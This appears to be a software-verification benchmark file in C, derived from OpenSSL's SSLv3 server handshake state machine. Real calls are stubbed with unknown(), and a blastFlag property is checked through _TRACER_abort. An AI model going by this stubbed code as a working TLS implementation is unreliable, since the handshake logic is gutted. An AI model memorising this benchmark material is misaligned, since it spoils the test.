*ssl , int is_export , int keysize ) ; DH *dh_tmp ; DH *(*dh_tmp_cb)(SSL *ssl , int is_export , int keysize ) ; CERT_PKEY pkeys[5] ; int references ; }; typedef struct cert_st CERT; struct sess_cert_st { STACK *cert_chain ; int peer_cert_type ; CERT_PKEY *peer_key ; CERT_PKEY peer_pkeys[5] ; RSA *peer_rsa_tmp ; DH *peer_dh_tmp ; int references ; }; typedef struct sess_cert_st SESS_CERT; struct ssl3_enc_method { int (*enc)(SSL * , int ) ; int (*mac)(SSL * , unsigned char * , int ) ; int (*setup_key_block)(SSL * ) ; int (*generate_master_secret)(SSL * , unsigned char * , unsigned char * , int ) ; int (*change_cipher_state)(SSL * , int ) ; int (*final_finish_mac)(SSL * , EVP_MD_CTX * , EVP_MD_CTX * , char const * , int , unsigned char * ) ; int finish_mac_length ; int (*cert_verify_mac)(SSL * , EVP_MD_CTX * , unsigned char * ) ; char const *client_finished_label ; int client_finished_label_len ; char const *server_finished_label ; int server_finished_label_len ; int (*alert_value)(int ) ; }; extern BUF_MEM *BUF_MEM_new(void) ; extern void BUF_MEM_free(BUF_MEM *a ) ; extern int BUF_MEM_grow(BUF_MEM *str , int len ) ; extern int RAND_pseudo_bytes(unsigned char *buf , int num ) ; extern void RAND_add(void const *buf , int num , double entropy ) ; extern int sk_num(STACK const * ) ; extern char *sk_value(STACK const * , int ) ; extern STACK *sk_new_null(void) ; extern void sk_free(STACK * ) ; extern void sk_pop_free(STACK *st , void (*func)(void * ) ) ; extern int sk_push(STACK *st , char *data ) ; extern char *sk_shift(STACK *st ) ; extern int CRYPTO_add_lock(int *pointer , int amount , int type , char const *file , int line ) ; extern long BIO_ctrl(BIO *bp , int cmd , long larg , void *parg ) ; extern time_t time(time_t *__timer ) ; extern int BN_num_bits(BIGNUM const *a ) ; extern void BN_clear_free(BIGNUM *a ) ; extern BIGNUM *BN_bin2bn(unsigned char const *s , int len , BIGNUM *ret ) ; extern int BN_bn2bin(BIGNUM const *a , unsigned char *to ) ; extern BIGNUM *BN_dup(BIGNUM const *a ) ; extern char *ASN1_dup(int (*i2d)() , char *(*d2i)() , char *x ) ; extern int RSA_private_decrypt(int flen , unsigned char *from , unsigned char *to , RSA *rsa , int padding ) ; extern int RSA_sign(int type , unsigned char *m , unsigned int m_len , unsigned char *sigret , unsigned int *siglen , RSA *rsa ) ; extern int RSA_verify(int type , unsigned char *m , unsigned int m_len , unsigned char *sigbuf , unsigned int siglen , RSA *rsa ) ; extern void DH_free(DH *dh ) ; extern int DH_generate_key(DH *dh ) ; extern int DH_compute_key(unsigned char *key , BIGNUM *pub_key , DH *dh ) ; DH *d2i_DHparams(DH **a , unsigned char **pp , long length ) {} int i2d_DHparams(DH *a , unsigned char **pp ) {} extern int DSA_verify(int type , unsigned char const *dgst , int dgst_len , unsigned char *sigbuf , int siglen , DSA *dsa ) ; extern void EVP_DigestInit(EVP_MD_CTX *ctx , EVP_MD const *type ) ; extern void EVP_DigestUpdate(EVP_MD_CTX *ctx , void const *d , unsigned int cnt ) ; extern void EVP_DigestFinal(EVP_MD_CTX *ctx , unsigned char *md , unsigned int *s ) ; extern int EVP_SignFinal(EVP_MD_CTX *ctx , unsigned char *md , unsigned int *s , EVP_PKEY *pkey ) ; extern EVP_MD *EVP_dss1(void) ; extern int EVP_PKEY_size(EVP_PKEY *pkey ) ; extern void EVP_PKEY_free(EVP_PKEY *pkey ) ; extern int i2d_X509_NAME(X509_NAME *a , unsigned char **pp ) ; void X509_free(X509 *a ) {} extern X509 *d2i_X509(X509 **a , unsigned char **pp , long length ) ; extern EVP_PKEY *X509_get_pubkey(X509 *x ) ; extern int X509_certificate_type(X509 *x , EVP_PKEY *pubkey ) ; extern void *memcpy(void * /* __restrict */ __dest , void const * /* __restrict */ __src , size_t __n ) ; extern void *memset(void *__s , int __c , size_t __n ) ; extern int *__errno_location(void) /* __attribute__((__const__)) */ ; extern void ERR_put_error(int lib , int func , int reason , char const *file , int line ) ; extern void ERR_clear_error(void) ; extern int SSL_clear(SSL *s ) ; SSL_METHOD *SSLv3_server_method(void) ; extern STACK *SSL_get_client_CA_list(SSL *s ) ; extern int SSL_state(SSL *ssl ) ; extern SSL_METHOD *sslv3_base_method(void) ; extern SESS_CERT *ssl_sess_cert_new(void) ; extern int ssl_get_new_session(SSL *s , int session ) ; extern int ssl_get_prev_session(SSL *s , unsigned char *session , int len ) ; extern STACK *ssl_bytes_to_cipher_list(SSL *s , unsigned char *p , int num , STACK **skp ) ; extern void ssl_update_cache(SSL *s , int mode ) ; extern int ssl_verify_cert_chain(SSL *s , STACK *sk ) ; extern X509 *ssl_get_server_send_cert(SSL * ) ; extern EVP_PKEY *ssl_get_sign_pkey(SSL * , SSL_CIPHER * ) ; extern STACK *ssl_get_ciphers_by_id(SSL *s ) ; extern int ssl_verify_alarm_type(long type ) ; extern int ssl3_put_cipher_by_char(SSL_CIPHER const *c , unsigned char *p ) ; extern void ssl3_init_finished_mac(SSL *s ) ; int ssl3_send_server_certificate(SSL *s ) ; extern int ssl3_get_finished(SSL *s , int state_a , int state_b ) ; extern int ssl3_send_change_cipher_spec(SSL *s , int state_a , int state_b ) ; extern void ssl3_cleanup_key_block(SSL *s ) ; extern int ssl3_do_write(SSL *s , int type ) ; extern void ssl3_send_alert(SSL *s , int level , int desc ) ; extern int ssl3_get_req_cert_type(SSL *s , unsigned char *p ) ; extern long ssl3_get_message(SSL *s , int st1 , int stn , int mt , long max , int *ok ) ; extern int ssl3_send_finished(SSL *s , int a , int b , char const *sender , int slen ) ; extern unsigned long ssl3_output_cert_chain(SSL *s , X509 *x ) ; extern SSL_CIPHER *ssl3_choose_cipher(SSL *ssl , STACK *have , STACK *pref ) ; extern int ssl3_setup_buffers(SSL *s ) ; int ssl3_accept(SSL *s ) ; extern int ssl_init_wbio_buffer(SSL *s , int push ) ; extern void ssl_free_wbio_buffer(SSL *s ) ; static SSL_METHOD *ssl3_get_server_method(int ver ) ; static int ssl3_get_client_hello(SSL *s ) ; static int ssl3_check_client_hello(SSL *s ) ; static int ssl3_send_server_hello(SSL *s ) ; static int ssl3_send_server_key_exchange(SSL *s ) ; static int ssl3_send_certificate_request(SSL *s ) ; static int ssl3_send_server_done(SSL *s ) ; static int ssl3_get_client_key_exchange(SSL *s ) ; static int ssl3_get_client_certificate(SSL *s ) ; static int ssl3_get_cert_verify(SSL *s ) ; static int ssl3_send_hello_request(SSL *s ) ; static SSL_METHOD *ssl3_get_server_method(int ver ) { SSL_METHOD *tmp ; { if (ver == 768) { tmp = SSLv3_server_method(); return (tmp); } else { return ((SSL_METHOD *)((void *)0)); } } } SSL_METHOD *SSLv3_server_method(void) ;static int init = 1; static SSL_METHOD SSLv3_server_data ; SSL_METHOD *SSLv3_server_method(void) { char *tmp ; { if (init) { tmp = (char *)sslv3_base_method(); memcpy((void * )((char *)(& SSLv3_server_data)), (void const * )tmp, sizeof(SSL_METHOD )); SSLv3_server_data.ssl_accept = & ssl3_accept; SSLv3_server_data.get_ssl_method = & ssl3_get_server_method; init = 0; } return (& SSLv3_server_data); } } // TRACER: to shadow s->state int myState; // TRACER: to shadow (s->s3)->tmp.next_state int myStateNext; extern int unknown(); int main() { SSL *s = 0; myState /*s->state*/ = 8464; return ssl3_accept(s); } int ssl3_accept(SSL *s ) { BUF_MEM *buf ; unsigned long l ; unsigned long Time ; unsigned long tmp ; void (*cb)() ; long num1 ; int ret ; int new_state ; int state ; int skip ; int got_new_session ; int *tmp___0 ; int tmp___1 ; int tmp___2 ; int tmp___3 ; int tmp___4 ; int tmp___5 ; int tmp___6 ; int tmp___7 ; long tmp___8 ; int tmp___9 ; int tmp___10 ; int blastFlag; { blastFlag = 0; //tmp = (unsigned long )time((time_t *)((void *)0)); tmp = unknown(); Time = tmp; cb = (void (*)())((void *)0); ret = -1; skip = 0; got_new_session = 0; //RAND_add((void const *)(& Time), (int )sizeof(Time), (double )0); //ERR_clear_error(); //tmp___0 = __errno_location(); (*tmp___0) = 0; if ((unsigned long )s->info_callback != (unsigned long )((void *)0)) { cb = s->info_callback; } else { if ((unsigned long )(s->ctx)->info_callback != (unsigned long )((void *)0)) { cb = (s->ctx)->info_callback; } } s->in_handshake ++; //tmp___1 = SSL_state(s); tmp___1 = unknown(); if (tmp___1 & 12288) { //tmp___2 = SSL_state(s); tmp___2 = unknown(); if (tmp___2 & 16384) { //SSL_clear(s); } } else { //SSL_clear(s); } if ((unsigned long )s->cert == (unsigned long )((void *)0)) { //ERR_put_error(20, 128, 179, (char const *)"s3_srvr.c", 187); return (-1); } while (1) { state = myState /*s->state*/; switch (myState /*s->state*/) { case 12292: s->new_session = 1; case 16384: ; case 8192: ; case 24576: ; case 8195: s->server = 1; if ((unsigned long )cb != (unsigned long )((void *)0)) { //((*cb))(s, 16, 1); } if (s->version >> 8 != 3) { //ERR_put_error(20, 128, 157, (char const *)"s3_srvr.c", 211); return (-1); } s->type = 8192; if ((unsigned long )s->init_buf == (unsigned long )((void *)0)) { //buf = BUF_MEM_new(); buf = unknown(); if ((unsigned long )buf == (unsigned long )((void *)0)) { ret = -1; goto end; } //tmp___3 = BUF_MEM_grow(buf, 16384); tmp___3 = unknown(); if (! tmp___3) { ret = -1; goto end; } s->init_buf = buf; } //tmp___4 = ssl3_setup_buffers(s); tmp___4 = unknown(); if (! tmp___4) { ret = -1; goto end; } s->init_num = 0; if (myState /*s->state*/ != 12292) { //tmp___5 = ssl_init_wbio_buffer(s, 1); tmp___5 = unknown(); if (! tmp___5) { ret = -1; goto end; } //ssl3_init_finished_mac(s); myState /*s->state*/ = 8464; (s->ctx)->stats.sess_accept ++; } else { (s->ctx)->stats.sess_accept_renegotiate ++; myState /*s->state*/ = 8480; } break; case 8480: ; case 8481: s->shutdown = 0; //ret = ssl3_send_hello_request(s); ret = unknown(); if (ret <= 0) { goto end; } myStateNext /*(s->s3)->tmp.next_state*/ = 8482; myState /*s->state*/ = 8448; s->init_num = 0; //ssl3_init_finished_mac(s); break; case 8482: myState /*s->state*/ = 3; break; case 8464: ; case 8465: ; case 8466: s->shutdown = 0; //ret = ssl3_get_client_hello(s); ret = unknown(); if(blastFlag == 0) blastFlag = 1; if (ret <= 0) { goto end; } got_new_session = 1; myState /*s->state*/ = 8496; s->init_num = 0; break; case 8496: ; case 8497: //ret = ssl3_send_server_hello(s); ret = unknown(); if(blastFlag == 1) blastFlag = 2; else if(blastFlag == 3) blastFlag = 4; if (ret <= 0) { goto end; } if (s->hit) { myState /*s->state*/ = 8656; } else { myState /*s->state*/ = 8512; } s->init_num = 0; break; case 8512: ; case 8513: ; if (((s->s3)->tmp.new_cipher)->algorithms & 256UL) { skip = 1; } else { //ret = ssl3_send_server_certificate(s); ret = unknown(); if (ret <= 0) { goto end; } } myState /*s->state*/ = 8528; s->init_num = 0; break; case 8528: ; case 8529: l = ((s->s3)->tmp.new_cipher)->algorithms; if (s->options & 2097152UL) { (s->s3)->tmp.use_rsa_tmp = 1; } else { (s->s3)->tmp.use_rsa_tmp = 0; } if ((s->s3)->tmp.use_rsa_tmp) { goto _L___0; } else { if (l & 30UL) { goto _L___0; } else { if (l & 1UL) { if ((unsigned long )(s->cert)->pkeys[0].privatekey == (unsigned long )((void *)0)) { goto _L___0; } else { if (((s->s3)->tmp.new_cipher)->algo_strength & 2UL) { //tmp___6 = EVP_PKEY_size((s->cert)->pkeys[0].privatekey); tmp___6 = unknown(); if (((s->s3)->tmp.new_cipher)->algo_strength & 4UL) { tmp___7 = 512; } else { tmp___7 = 1024; } if (tmp___6 * 8 > tmp___7) { _L___0: _L: //ret = ssl3_send_server_key_exchange(s); ret = unknown(); if (ret <= 0) { goto end; } } else { skip = 1; } } else { skip = 1; } } } else { skip = 1; } } } myState /*s->state*/ = 8544; s->init_num = 0; break; case 8544: ; case 8545: ; if (s->verify_mode & 1) { if ((unsigned long )(s->session)->peer != (unsigned long )((void *)0)) { if (s->verify_mode & 4) { skip = 1; (s->s3)->tmp.cert_request = 0; myState /*s->state*/ = 8560; } else { goto _L___2; } } else { _L___2: if (((s->s3)->tmp.new_cipher)->algorithms & 256UL) { if (s->verify_mode & 2) { goto _L___1; } else { skip = 1; (s->s3)->tmp.cert_request = 0; myState /*s->state*/ = 8560; } } else { _L___1: (s->s3)->tmp.cert_request = 1; //ret = ssl3_send_certificate_request(s); ret = unknown(); if (ret <= 0) { goto end; } myState /*s->state*/ = 8448; myStateNext /*(s->s3)->tmp.next_state*/ = 8576; s->init_num = 0; } } } else { skip = 1; (s->s3)->tmp.cert_request = 0; myState /*s->state*/ = 8560; } break; case 8560: ; case 8561: //ret = ssl3_send_server_done(s); ret = unknown(); if (ret <= 0) { goto end; } myStateNext /*(s->s3)->tmp.next_state*/ = 8576; myState /*s->state*/ = 8448; s->init_num = 0; break; case 8448: //num1 = BIO_ctrl(s->wbio, 3, 0L, (void *)0); num1 = unknown(); if (num1 > 0L) { s->rwstate = 2; //tmp___8 = BIO_ctrl(s->wbio, 11, 0L, (void *)0); num1 = (long )((int )tmp___8); if (num1 <= 0L) { ret = -1; goto end; } s->rwstate = 1; } myState /*s->state*/ = myStateNext /*(s->s3)->tmp.next_state*/; break; case 8576: ; case 8577: //ret = ssl3_check_client_hello(s); ret = unknown(); if (ret <= 0) { goto end; } if (ret == 2) { myState /*s->state*/ = 8466; } else { //ret = ssl3_get_client_certificate(s); ret = unknown(); if (ret <= 0) { goto end; } s->init_num = 0; myState /*s->state*/ = 8592; } break; case 8592: ; case 8593: //ret = ssl3_get_client_key_exchange(s); ret = unknown(); if (ret <= 0) { goto end; } myState /*s->state*/ = 8608; s->init_num = 0; //((*(((s->method)->ssl3_enc)->cert_verify_mac)))(s, & (s->s3)->finish_dgst1, & (s->s3)->tmp.cert_verify_md[0]); //((*(((s->method)->ssl3_enc)->cert_verify_mac)))(s, & (s->s3)->finish_dgst2, & (s->s3)->tmp.cert_verify_md[16]); break; case 8608: ; case 8609: //ret = ssl3_get_cert_verify(s); ret = unknown(); if (ret <= 0) { goto end; } myState /*s->state*/ = 8640; s->init_num = 0; break; case 8640: ; case 8641: //ret = ssl3_get_finished(s, 8640, 8641); ret = unknown(); if (ret <= 0) { goto end; } if (s->hit) { myState /*s->state*/ = 3; } else { myState /*s->state*/ = 8656; } s->init_num = 0; break; case 8656: ; case 8657: (s->session)->cipher = (s->s3)->tmp.new_cipher; //tmp___9 = ((*(((s->method)->ssl3_enc)->setup_key_block)))(s); tmp___9 = unknown(); if (! tmp___9) { ret = -1; goto end; } //ret = ssl3_send_change_cipher_spec(s, 8656, 8657); ret = unknown(); if(blastFlag == 2) blastFlag = 3; if (ret <= 0) { goto end; } myState /*s->state*/ = 8672; s->init_num = 0; //tmp___10 = ((*(((s->method)->ssl3_enc)->change_cipher_state)))(s, 34); tmp___10 = unknown(); if (! tmp___10) { ret = -1; goto end; } break; case 8672: ; case 8673: //ret = ssl3_send_finished(s, 8672, 8673, ((s->method)->ssl3_enc)->server_finished_label,((s->method)->ssl3_enc)->server_finished_label_len); ret = unknown(); //if(blastFlag == 4) goto ERROR; _TRACER_abort(blastFlag == 4); if (ret <= 0) { goto end; } myState /*s->state*/ = 8448; if (s->hit) { myStateNext /*(s->s3)->tmp.next_state*/ = 8640; } else { myStateNext /*(s->s3)->tmp.next_state*/ = 3; } s->init_num = 0; break; case 3: //ssl3_cleanup_key_block(s); //BUF_MEM_free(s->init_buf); s->init_buf = (BUF_MEM *)((void *)0); //ssl_free_wbio_buffer(s); s->init_num = 0; if (got_new_session) { s->new_session = 0; //ssl_update_cache(s, 2); (s->ctx)->stats.sess_accept_good ++; s->handshake_func = (int (*)())(& ssl3_accept); if ((unsigned long )cb != (unsigned long )((void *)0)) { //((*cb))(s, 32, 1); } } ret = 1; goto end; default: //ERR_put_error(20, 128, 255, (char const *)"s3_srvr.c", 536); ret = -1; goto end; } if (! (s->s3)->tmp.reuse_message) { if (! skip) { if (s->debug) { //ret = (int )BIO_ctrl(s->wbio, 11, 0L, (void *)0); ret = unknown(); if (ret <= 0) { goto end; } } if ((unsigned long )cb != (unsigned long )((void *)0)) { if (myState /*s->state*/ != state) { new_state = myState /*s->state*/; myState /*s->state*/ = state; //((*cb))(s, 8193, 1); myState /*s->state*/ = new_state; } } } } skip = 0; } end: s->in_handshake --; if ((unsigned long )cb != (unsigned long )((void *)0)) { //((*cb))(s, 8194, ret); } return (ret); // ERROR: goto ERROR; } } static int ssl3_send_hello_request(SSL *s ) { unsigned char *p ; unsigned char *tmp ; unsigned char *tmp___0 ; unsigned char *tmp___1 ; unsigned char *tmp___2 ; int tmp___3 ; { if (s->state == 8480) { p = (unsigned char *)(s->init_buf)->data; tmp = p; p ++; (*tmp) = 0; tmp___0 = p; p ++; (*tmp___0) = 0; tmp___1 = p; p ++; (*tmp___1) = 0; tmp___2 = p; p ++; (*tmp___2) = 0; s->state = 8481; s->init_num = 4; s->init_off = 0; } tmp___3 = ssl3_do_write(s, 22); return (tmp___3); } }static int ssl3_check_client_hello(SSL *s ) { int ok ; long n ; { n = ssl3_get_message(s, 8576, 8577, -1, 102400L, & ok); if (! ok) { return ((int )n); } (s->s3)->tmp.reuse_message = 1; if ((s->s3)->tmp.message_type == 1) { if ((unsigned long )(s->s3)->tmp.dh != (unsigned long )((void *)0)) { DH_free((s->s3)->tmp.dh); (s->s3)->tmp.dh = (DH *)((void *)0); } return (2); } return (1); } }static int ssl3_get_client_hello(SSL *s ) { int i ; int j ; int ok ; int al ; int ret ; long n ; unsigned long id ; unsigned char *p ; unsigned char *d ; unsigned char *q ; SSL_CIPHER *c ; SSL_COMP *comp ; STACK *ciphers ; unsigned char *tmp ; int tmp___0 ; int tmp___1 ; STACK *tmp___2 ; int tmp___4 ; int tmp___6 ; unsigned char *tmp___7 ; int m ; int nn ; int o ; int v ; int done ; STACK *tmp___9 ; STACK *sk ; SSL_CIPHER *nc ; SSL_CIPHER *ec ; int tmp___11 ; { ret = -1; comp = (SSL_COMP *)((void *)0); ciphers = (STACK *)((void *)0); if (s->state == 8464) { s->first_packet = 1; s->state = 8465; } n = ssl3_get_message(s, 8465, 8466, 1, 16384L, & ok); if (! ok) { return ((int )n); } p = (unsigned char *)(s->init_buf)->data; d = p; s->client_version = ((int )(*(p + 0)) << 8) | (int )(*(p + 1)); p += 2; if (s->client_version < s->version) { ERR_put_error(20, 138, 267, (char const *)"s3_srvr.c", 667); if (s->client_version >> 8 == 3) { s->version = s->client_version; } al = 70; goto f_err; } memcpy((void * )((s->s3)->client_random), (void const * )p, 32U); p += 32; tmp = p; p ++; j = (int )(*tmp); s->hit = 0; if (j == 0) { tmp___0 = ssl_get_new_session(s, 1); if (! tmp___0) { goto err; } } else { i = ssl_get_prev_session(s, p, j); if (i == 1) { s->hit = 1; } else { if (i == -1) { goto err; } else { tmp___1 = ssl_get_new_session(s, 1); if (! tmp___1) { goto err; } } } } p += j; i = (int )(((unsigned int )(*(p + 0)) << 8) | (unsigned int )(*(p + 1))); p += 2; if (i == 0) { if (j != 0) { al = 47; ERR_put_error(20, 138, 183, (char const *)"s3_srvr.c", 712); goto f_err; } } if ((unsigned long )(p + i) > (unsigned long )(d + n)) { al = 50; ERR_put_error(20, 138, 159, (char const *)"s3_srvr.c", 719); goto f_err; } if (i > 0) { tmp___2 = ssl_bytes_to_cipher_list(s, p, i, & ciphers); if ((unsigned long )tmp___2 == (unsigned long )((void *)0)) { goto err; } } p += i; if (s->hit) { if (i > 0) { j = 0; id = ((s->session)->cipher)->id; i = 0; while (1) { tmp___4 = sk_num((STACK const *)ciphers); if (! (i < tmp___4)) { break; } c = (SSL_CIPHER *)sk_value((STACK const *)ciphers, i); if (c->id == id) { j = 1; break; } i ++; } if (j == 0) { if (s->options & 8UL) { tmp___6 = sk_num((STACK const *)ciphers); if (tmp___6 == 1) { (s->session)->cipher = (SSL_CIPHER *)sk_value((STACK const *)ciphers, 0); } else { al = 47; ERR_put_error(20, 138, 215, (char const *)"s3_srvr.c", 764); goto f_err; } } else { al = 47; ERR_put_error(20, 138, 215, (char const *)"s3_srvr.c", 764); goto f_err; } } } } tmp___7 = p; p ++; i = (int )(*tmp___7); q = p; j = 0; while (j < i) { if ((int )(*(p + j)) == 0) { break; } j ++; } p += i; if (j >= i) { al = 50; ERR_put_error(20, 138, 187, (char const *)"s3_srvr.c", 783); goto f_err; } (s->s3)->tmp.new_compression = (SSL_COMP const *)((void *)0); if ((unsigned long )(s->ctx)->comp_methods != (unsigned long )((void *)0)) { done = 0; nn = sk_num((STACK const *)(s->ctx)->comp_methods); m = 0; while (m < nn) { comp = (SSL_COMP *)sk_value((STACK const *)(s->ctx)->comp_methods, m); v = comp->id; o = 0; while (o < i) { if (v == (int )(*(q + o))) { done = 1; break; } o ++; } if (done) { break; } m ++; } if (done) { (s->s3)->tmp.new_compression = (SSL_COMP const *)comp; } else { comp = (SSL_COMP *)((void *)0); } } if (s->version == 768) { if ((unsigned long )p > (unsigned long )(d + n)) { al = 50; ERR_put_error(20, 138, 159, (char const *)"s3_srvr.c", 824); goto f_err; } } if (s->hit) { nc = (SSL_CIPHER *)((void *)0); ec = (SSL_CIPHER *)((void *)0); if (s->options & 2147483648UL) { sk = (s->session)->ciphers; i = 0; while (1) { tmp___11 = sk_num((STACK const *)sk); if (! (i < tmp___11)) { break; } c = (SSL_CIPHER *)sk_value((STACK const *)sk, i); if (c->algorithms & 65536UL) { nc = c; } if (c->algo_strength & 2UL) { ec = c; } i ++; } if ((unsigned long )nc != (unsigned long )((void *)0)) { (s->s3)->tmp.new_cipher = nc; } else { if ((unsigned long )ec != (unsigned long )((void *)0)) { (s->s3)->tmp.new_cipher = ec; } else { (s->s3)->tmp.new_cipher = (s->session)->cipher; } } } else { (s->s3)->tmp.new_cipher = (s->session)->cipher; } } else { if ((unsigned long )comp == (unsigned long )((void *)0)) { (s->session)->compress_meth = 0; } else { (s->session)->compress_meth = comp->id; } if ((unsigned long )(s->session)->ciphers != (unsigned long )((void *)0)) { sk_free((s->session)->ciphers); } (s->session)->ciphers = ciphers; if ((unsigned long )ciphers == (unsigned long )((void *)0)) { al = 47; ERR_put_error(20, 138, 182, (char const *)"s3_srvr.c", 841); goto f_err; } ciphers = (STACK *)((void *)0); tmp___9 = ssl_get_ciphers_by_id(s); c = ssl3_choose_cipher(s, (s->session)->ciphers, tmp___9); if ((unsigned long )c == (unsigned long )((void *)0)) { al = 40; ERR_put_error(20, 138, 193, (char const *)"s3_srvr.c", 851); goto f_err; } (s->s3)->tmp.new_cipher = c; } ret = 1; if (0) { f_err: ssl3_send_alert(s, 2, al); } err: if ((unsigned long )ciphers != (unsigned long )((void *)0)) { sk_free(ciphers); } return (ret); } }static int ssl3_send_server_hello(SSL *s ) { unsigned char *buf ; unsigned char *p ; unsigned char *d ; int i ; int sl ; unsigned long l ; unsigned long Time ; unsigned char *tmp ; unsigned char *tmp___0 ; unsigned char *tmp___1 ; unsigned char *tmp___2 ; unsigned char *tmp___3 ; unsigned char *tmp___4 ; unsigned char *tmp___5 ; unsigned char *tmp___6 ; unsigned char *tmp___7 ; unsigned char *tmp___8 ; int tmp___9 ; { if (s->state == 8496) { buf = (unsigned char *)(s->init_buf)->data; p = (s->s3)->server_random; Time = (unsigned long )time((time_t *)((void *)0)); tmp = p; p ++; (*tmp) = (unsigned char )((Time >> 24) & 255UL); tmp___0 = p; p ++; (*tmp___0) = (unsigned char )((Time >> 16) & 255UL); tmp___1 = p; p ++; (*tmp___1) = (unsigned char )((Time >> 8) & 255UL); tmp___2 = p; p ++; (*tmp___2) = (unsigned char )(Time & 255UL); RAND_pseudo_bytes(p, (int )(32U - sizeof(Time))); p = buf + 4; d = p; tmp___3 = p; p ++; (*tmp___3) = (unsigned char )(s->version >> 8); tmp___4 = p; p ++; (*tmp___4) = (unsigned char )(s->version & 255); memcpy((void * )p, (void const * )((s->s3)->server_random), 32U); p += 32; if (! ((s->ctx)->session_cache_mode & 2)) { (s->session)->session_id_length = 0U; } sl = (int )(s->session)->session_id_length; tmp___5 = p; p ++; (*tmp___5) = (unsigned char )sl; memcpy((void * )p, (void const * )((s->session)->session_id), (unsigned int )sl); p += sl; i = ssl3_put_cipher_by_char((SSL_CIPHER const *)(s->s3)->tmp.new_cipher, p); p += i; if ((unsigned long )(s->s3)->tmp.new_compression == (unsigned long )((void *)0)) { tmp___6 = p; p ++; (*tmp___6) = 0; } else { tmp___7 = p; p ++; (*tmp___7) = (unsigned char )((s->s3)->tmp.new_compression)->id; } l = (unsigned long )(p - d); d = buf; tmp___8 = d; d ++; (*tmp___8) = 2; (*(d + 0)) = (unsigned char )((l >> 16) & 255UL); (*(d + 1)) = (unsigned char )((l >> 8) & 255UL); (*(d + 2)) = (unsigned char )(l & 255UL); d += 3; s->state = 4369; s->init_num = p - buf; s->init_off = 0; } tmp___9 = ssl3_do_write(s, 22); return (tmp___9); } }static int ssl3_send_server_done(SSL *s ) { unsigned char *p ; unsigned char *tmp ; unsigned char *tmp___0 ; unsigned char *tmp___1 ; unsigned char *tmp___2 ; int tmp___3 ; { if (s->state == 8560) { p = (unsigned char *)(s->init_buf)->data; tmp = p; p ++; (*tmp) = 14; tmp___0 = p; p ++; (*tmp___0) = 0; tmp___1 = p; p ++; (*tmp___1) = 0; tmp___2 = p; p ++; (*tmp___2) = 0; s->state = 8561; s->init_num = 4; s->init_off = 0; } tmp___3 = ssl3_do_write(s, 22); return (tmp___3); } }static int ssl3_send_server_key_exchange(SSL *s ) { unsigned char *q ; int j ; int num ; RSA *rsa ; unsigned char md_buf[36] ; unsigned int u ; DH *dh ; DH *dhp ; EVP_PKEY *pkey ; unsigned char *p ; unsigned char *d ; int al ; int i ; unsigned long type ; int n ; CERT *cert ; BIGNUM *r[4] ; int nr[4] ; int kn ; BUF_MEM *buf ; EVP_MD_CTX md_ctx ; int tmp ; int tmp___0 ; int tmp___2 ; int tmp___3 ; int tmp___4 ; EVP_MD const *tmp___5 ; int tmp___6 ; EVP_MD const *tmp___7 ; int tmp___8 ; unsigned char *tmp___9 ; int tmp___10 ; { dh = (DH *)((void *)0); if (s->state == 8528) { type = ((s->s3)->tmp.new_cipher)->algorithms & 31UL; cert = s->cert; buf = s->init_buf; r[3] = (BIGNUM *)((void *)0); r[2] = r[3]; r[1] = r[2]; r[0] = r[1]; n = 0; if (type & 1UL) { rsa = cert->rsa_tmp; if ((unsigned long )rsa == (unsigned long )((void *)0)) { if ((unsigned long )(s->cert)->rsa_tmp_cb != (unsigned long )((void *)0)) { if (((s->s3)->tmp.new_cipher)->algo_strength & 4UL) { tmp = 512; } else { tmp = 1024; } rsa = ((*((s->cert)->rsa_tmp_cb)))(s, (int )(((s->s3)->tmp.new_cipher)->algo_strength & 2UL), tmp); if ((unsigned long )rsa == (unsigned long )((void *)0)) { al = 40; ERR_put_error(20, 155, 1092, (char const *)"s3_srvr.c", 1043); goto f_err; } CRYPTO_add_lock(& rsa->references, 1, 9, (char const *)"s3_srvr.c", 1046); cert->rsa_tmp = rsa; } } if ((unsigned long )rsa == (unsigned long )((void *)0)) { al = 40; ERR_put_error(20, 155, 172, (char const *)"s3_srvr.c", 1052); goto f_err; } r[0] = rsa->n; r[1] = rsa->e; (s->s3)->tmp.use_rsa_tmp = 1; } else { if (type & 16UL) { dhp = cert->dh_tmp; if ((unsigned long )dhp == (unsigned long )((void *)0)) { if ((unsigned long )(s->cert)->dh_tmp_cb != (unsigned long )((void *)0)) { if (((s->s3)->tmp.new_cipher)->algo_strength & 4UL) { tmp___0 = 512; } else { tmp___0 = 1024; } dhp = ((*((s->cert)->dh_tmp_cb)))(s, (int )(((s->s3)->tmp.new_cipher)->algo_strength & 2UL), tmp___0); } } if ((unsigned long )dhp == (unsigned long )((void *)0)) { al = 40; ERR_put_error(20, 155, 171, (char const *)"s3_srvr.c", 1072); goto f_err; } if ((unsigned long )(s->s3)->tmp.dh != (unsigned long )((void *)0)) { DH_free(dh); ERR_put_error(20, 155, 157, (char const *)"s3_srvr.c", 1079); goto err; } dh = (DH *)ASN1_dup((int (*)())(& i2d_DHparams), (char *(*)())(& d2i_DHparams), (char *)dhp); if ((unsigned long )dh == (unsigned long )((void *)0)) { ERR_put_error(20, 155, 5, (char const *)"s3_srvr.c", 1085); goto err; } (s->s3)->tmp.dh = dh; if ((unsigned long )dhp->pub_key == (unsigned long )((void *)0)) { goto _L; } else { if ((unsigned long )dhp->priv_key == (unsigned long )((void *)0)) { goto _L; } else { if (s->options & 1048576UL) { _L: tmp___2 = DH_generate_key(dh); if (! tmp___2) { ERR_put_error(20, 155, 5, (char const *)"s3_srvr.c", 1096); goto err; } } else { dh->pub_key = BN_dup((BIGNUM const *)dhp->pub_key); dh->priv_key = BN_dup((BIGNUM const *)dhp->priv_key); if ((unsigned long )dh->pub_key == (unsigned long )((void *)0)) { ERR_put_error(20, 155, 5, (char const *)"s3_srvr.c", 1108); goto err; } else { if ((unsigned long )dh->priv_key == (unsigned long )((void *)0)) { ERR_put_error(20, 155, 5, (char const *)"s3_srvr.c", 1108); goto err; } } } } } r[0] = dh->p; r[1] = dh->g; r[2] = dh->pub_key; } else { al = 40; ERR_put_error(20, 155, 250, (char const *)"s3_srvr.c", 1120); goto f_err; } } i = 0; while ((unsigned long )r[i] != (unsigned long )((void *)0)) { tmp___3 = BN_num_bits((BIGNUM const *)r[i]); nr[i] = (tmp___3 + 7) / 8; n += 2 + nr[i]; i ++; } if (((s->s3)->tmp.new_cipher)->algorithms & 256UL) { pkey = (EVP_PKEY *)((void *)0); kn = 0; } else { pkey = ssl_get_sign_pkey(s, (s->s3)->tmp.new_cipher); if ((unsigned long )pkey == (unsigned long )((void *)0)) { al = 50; goto f_err; } kn = EVP_PKEY_size(pkey); } tmp___4 